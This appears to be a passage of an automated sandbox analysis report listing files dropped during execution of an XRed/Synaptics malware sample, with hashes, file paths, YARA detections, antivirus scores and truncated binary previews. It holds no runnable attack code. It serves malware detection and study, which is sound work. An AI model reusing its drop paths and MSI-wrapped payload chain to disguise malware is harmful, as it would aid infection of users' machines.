                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.258890402884764
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0U0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                        MD5:09B48AF383E16F2084484D83D1AC1D38
                                                                                                        SHA1:C568FF88E23805CCD94EFE5E00AB32159D8B4BA9
                                                                                                        SHA-256:C9ADD594646C9C8B805B5ABDC2D39CF134D0868E54E95E36B0BD241DB950799A
                                                                                                        SHA-512:481417FBFD35E6E5A34BCDC88DA8989446B5A908B2439DAA49E54AF7FF6F3CFD67758FA1E97FD530732F349D91E250CC8EC450D47EC042BC5B1C0391F3C3CA7E
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fphLzuXZze2c7GRtJGL_Ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.258163327254064
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0cgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                        MD5:6F50B2298A65B20DE015126CCCB910C5
                                                                                                        SHA1:532148D5E8063B395DF45C8E97C0A5FE5B7842B5
                                                                                                        SHA-256:0E67D248083F3BE12E433983CCBDB682E43E9E4327663C89D935ECE260B03F78
                                                                                                        SHA-512:9C0EEC2E82476AF703D9184EC8F01510EA8EF5504A9BC664C58DB19F1C81CF0D8A4C390C30731E09C52C3ECF0DC918F73319A4454CB541210901A3DBE4A845C0
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.251523581447559
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0zGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                        MD5:903A3D5716B58A0D0328F97DD67F0A39
                                                                                                        SHA1:3BC8ECCEA803B23C37A7E16BF5733F92927DFC91
                                                                                                        SHA-256:1B44BBAAC4E7AE027203A2BA7085119337E47DBABF9EAEBC77039003EDB8E237
                                                                                                        SHA-512:F9FA992478846AAAA83F78E8CAA29BC3C65CAEE73ED0E4022261B94E8807984D460D92B326D1B781263A2B6F7B763E82511DD1841DE6DFF13CEDF4524F95267C
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.270609497087012
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0J9SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                        MD5:0B0A7B6ECAFA5EEC1824A4BE4EFF97A0
                                                                                                        SHA1:5D7286738E472395B6B51D0F437358932397D53E
                                                                                                        SHA-256:54DFA629B0BE40041382F94EC29393FAB9AC65CFCB21AF731F9C77FD9011A4DA
                                                                                                        SHA-512:2ED32719C44A15E2B8DDE0D1449974E2CF0D35C89E60879D1C956EBE78C3941F47A586244AB929E9E72D8876246D93B2AB18BEF788CB10A4787CF3CF05C47E16
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.266243430971787
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0SbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                        MD5:ABC711D01F3F3853EB31129B274014A8
                                                                                                        SHA1:7290D801125CE0CCA56EF0A2D79A8AE8320A7993
                                                                                                        SHA-256:90DF5C0AA4009F8B8367376C3AEA2BBD596A4B0BCC54009E32AD1A1A86A836E5
                                                                                                        SHA-512:F55BEED52168A30624E96926EF81E4CE20DD6BE078B2F187AC270268F4FD08E178C7BB3BE32DB32E5B147C80F265C6F5C53803530C75D39088C4C281F496D18B
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.251182620746107
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                        MD5:87EA8D3FD12DCA241E61BFEE02B5E7A7
                                                                                                        SHA1:AA7FB3A1EFB08399B3858AAC5B8BB46FA543B7B1
                                                                                                        SHA-256:0084AAB34E4FC73D8DFF7AEDD6FC182FF47ECC22C790F3BCE2BB265CF111C491
                                                                                                        SHA-512:FFC4C0A2426CF3D7460C9B048378BF016E638868D76B4BA9BBDD30CAB579C74A39591361E4811FAFAE50C0CC8E6816A701F5F58F829D6A523FAEC1A9B2C0C10F
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.256610466806268
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+08DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+rD+pAZewRDK4mW
                                                                                                        MD5:FC462A64821299E5F6FB0D54056EE80F
                                                                                                        SHA1:8F21A65382E27694B52B9DA967D28EA5590ADFA3
                                                                                                        SHA-256:34FA8541C3C88AB83EABF231692DC98D85A677782D800C88F50F3F42100A828B
                                                                                                        SHA-512:40C09AF075C5AED7CB0DE653FDE877FA2A3074955C7E9FF5496518A4268760D457A7A33FD96B5C4FD79DE4CBFF1DBE92854DAD261C7E03ABC3DECCC098632435
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.257162116479252
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0S3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                        MD5:5969BA7F2C997D1AA36DAFC6EAB4587A
                                                                                                        SHA1:11D6C5B25E7B469AC2BA2C46964E34FCD1998E87
                                                                                                        SHA-256:7A3BB528D271B2FE9461BBABE6DE2B9CBA3896DBFE32B75D11BE73A9E6D978EB
                                                                                                        SHA-512:A0309B77EBD536EAB603E86737AC7526CC4BEFEE6E109A00E4BD70BAA5521BEFDD2CB8DE489CB7DD3AA07611B242D85E3F178363BE3819FAB00AB94F2F61C86B
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1jT1C1KnAy4kKerndQdG8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):165
                                                                                                        Entropy (8bit):1.3520167401771568
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                        MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                        SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                        SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                        SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                        Malicious:false
                                                                                                        Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):3.746897789531007
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                        Malicious:false
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                        Category:dropped
                                                                                                        Size (bytes):18387
                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                        Malicious:false
                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):165
                                                                                                        Entropy (8bit):1.3520167401771568
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                        MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                        SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                        SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                        SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                        Malicious:false
                                                                                                        Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):771584
                                                                                                        Entropy (8bit):6.6408899377896855
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9p
                                                                                                        MD5:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        SHA1:A35D73E54E4BA166AC30889F57FA58284881102A
                                                                                                        SHA-256:2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                                                                                                        SHA-512:F8A257ABA57A1EACF8F280651E74F97D2E14F326139282ABB506764C95FB57DB9C4708BAFD1AC027B030C40A866BE2BD04B3B0BFAC82F748B147E8A17DBD7188
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: KOGJZW.exe, Detection: malicious, Browse
                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1757184
                                                                                                        Entropy (8bit):7.442319740969341
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:+EJnsHyjtk2MYC5GDChloJfWJ255hpB14Rd:1nsmtk2arhlTJ23h
                                                                                                        MD5:51DD5767DE678BB6359CBB175319F0EC
                                                                                                        SHA1:76AE487DDA6CF3651A9B2B30614C0FEFD1F3149C
                                                                                                        SHA-256:5A49F64634AC29F37B3E53F5A1E37B90E8F3A385683F24083C68AEE092408314
                                                                                                        SHA-512:FFB798290E2F6840EB8F0587DC675E8654589BFD070B1C54E49C7984272AA94DA3A493CBD28B1DDDEF1F6A44B09AD9FD8A14EC0D77B90F948DC85089F91CC8A0
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\63d57e.msi, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\63d57e.msi, Author: Joe Security
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1730258
                                                                                                        Entropy (8bit):7.489581382934968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:ynsHyjtk2MYC5GDChloJfWJ255hpB14RdG:ynsmtk2arhlTJ23hf
                                                                                                        MD5:34A89FE73E294D1CF5655E99480E97B9
                                                                                                        SHA1:D7671E3F47650188FBE5599A9E524984B775B966
                                                                                                        SHA-256:DFA7121756A6CAB67FA1FBEF8D5EF8B2BE5A52A32BA491AD0659D07DC8645FCD
                                                                                                        SHA-512:FA35541693618EB9E31A802AAE3A01FB30CADA33C37A390F6DD216F12F80B6FC270390AD0310D159C52001A771066DCAFE4D9FD1D89C81EAB11C68ECD6071FE8
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSID6D6.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSID6D6.tmp, Author: Joe Security
                                                                                                        Preview:...@IXOS.@.....@&..Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..xyxmml.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......d..MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..............................
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1729536
                                                                                                        Entropy (8bit):7.489873659196219
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:snsHyjtk2MYC5GDChloJfWJ255hpB14RdZ:snsmtk2arhlTJ23hg
                                                                                                        MD5:1D2237FAF8E6198625010CB580280901
                                                                                                        SHA1:592449BDDF763BB63C22F638CB42F71484F87F06
                                                                                                        SHA-256:78643B903379276085C5EF0092AFC5C10DEE821C5754E01BC8EF835907B16AC4
                                                                                                        SHA-512:8ABE1FF967D92C663080CAF54F315E534EA296C91474D66CD327DCCC38A3AA8685101649BB120E28F1438011596DDE4F2F83E8150C90D51529EFCE9906A5AA0B
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.1628581993880864
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:JSbX72FjgAGiLIlHVRpth/7777777777777777777777777vDHFLYIJa1pSl0i8Q:JqQI5plpJabF
                                                                                                        MD5:E5F3D2DE4CBCB0DDD2A49BDD62D7F771
                                                                                                        SHA1:6206DB78ED1A4D9EF3B922478975A914AA52AC7D
                                                                                                        SHA-256:D47ECA810641ED1444D498D9E40A763BE29B95DFAA027254DC8A219E434E3FCC
                                                                                                        SHA-512:1D531B0A2EEC03DD56836322DE883E68905E1CDF35D9F94F994D81F28E9969FDBE0C1B8DC81A801FEC4DF4CA77CF62B6AAB4963BB751EB29E82FE88311702C33
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.416672635633971
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JpO38Phbuh3iFip1GE2yza2t4KAQBHodagUMClXtOVt+HipVJ+ZVqKwGlrk/ipVA:M8PhbuRc06WXOCnT5QtGSzUgssSzfTl
                                                                                                        MD5:005AE12E11C27381B759AD9F9AA04B8C
                                                                                                        SHA1:90EDC433DD864CB01E246509D73A2217E06DBCCA
                                                                                                        SHA-256:973B9F9AFAFF26077C289233ACB78C4ABB725CB805E95795422900B68E668672
                                                                                                        SHA-512:1FE504437839CF37D549678642A4C0BAB622E227F7CE241B142D4DD53A3C09B8C07180A9833F0706B2B66BD784521EF752BDFA6F6EF62E2B44C00BBB66F06233
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):360001
                                                                                                        Entropy (8bit):5.362960859505823
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaul:zTtbmkExhMJCIpEw
                                                                                                        MD5:408A48636C82B75F3E04889C83F32D77
                                                                                                        SHA1:002BC2F55D49E82D5A0C81568D67E26477660FD5
                                                                                                        SHA-256:76B844F8EDA6F65DB55342A41C7E34D4C5B3A4337E3A764D32D7F71A56F00CA1
                                                                                                        SHA-512:15B3CDA905902218F779D6D0D1CDE235A0ECAFBF90B0DB54211E184E12056637205DFA152C61DADB55FA4024CC58EE1FF2A9C69005F3B4A6D2A41ADBDD0C230A
                                                                                                        Malicious:false
                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                        Process:C:\Windows\Installer\MSID754.tmp
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                        Category:dropped
                                                                                                        Size (bytes):957952
                                                                                                        Entropy (8bit):7.875620970115749
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:xhloDX0XOf4nBz255HblZJgfKRjO45P1NGRdEx:xhloJfWJ255hpB14Rd
                                                                                                        MD5:A1D37A2A0A4CD5038E129946EE935868
                                                                                                        SHA1:87042FBECF1558A2E974C6AD045584F23E1AC7C9
                                                                                                        SHA-256:9988B0297AD8BE4BD3C559437176EACA54CDC36593728967395C4DEE21FC898C
                                                                                                        SHA-512:EB6CFCC7B1C526C06737DC6187AF4F65BDD178FFC951CF8BB13571B44CC2C3C0CD051C6E9B4930433F8E6830420A04E0B538D353DD86A1FEFB0663032C37C03C
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...u.Jg.........."......P...`....................@..........................@ ...........@...@.......@......................1 .$........Q...................5 .........................................H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc....`.......V...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):1.1461440853710205
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JhNhx36Dux6Zi7riptk2xza2t4hA3ZdagUMClXtW5Vt+HipVJ+ZVqKwGlrk/ipVA:56DuQZsrMLFXOxT5+tGSzUgssSzfTl
                                                                                                        MD5:8C42BC6A427841EC6B19C98D02C5282E
                                                                                                        SHA1:2B4AA61405E356C979B6722136ED967AD9EED88F
                                                                                                        SHA-256:D53F48DD19293B88EFE4355CF63E7E3E35C69E0A8F5F005375F31BCADC1FC2A6
                                                                                                        SHA-512:74DFB273561B041D83AA5DAE4DB61A457B0F43C2ABEBC063EDDEC050846E76CD576FB6E0FC3174FA21DA1B9418EFAC4546608107FC94B26CD69A82B460931285
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.416672635633971
                                                                                                        Encrypted:false
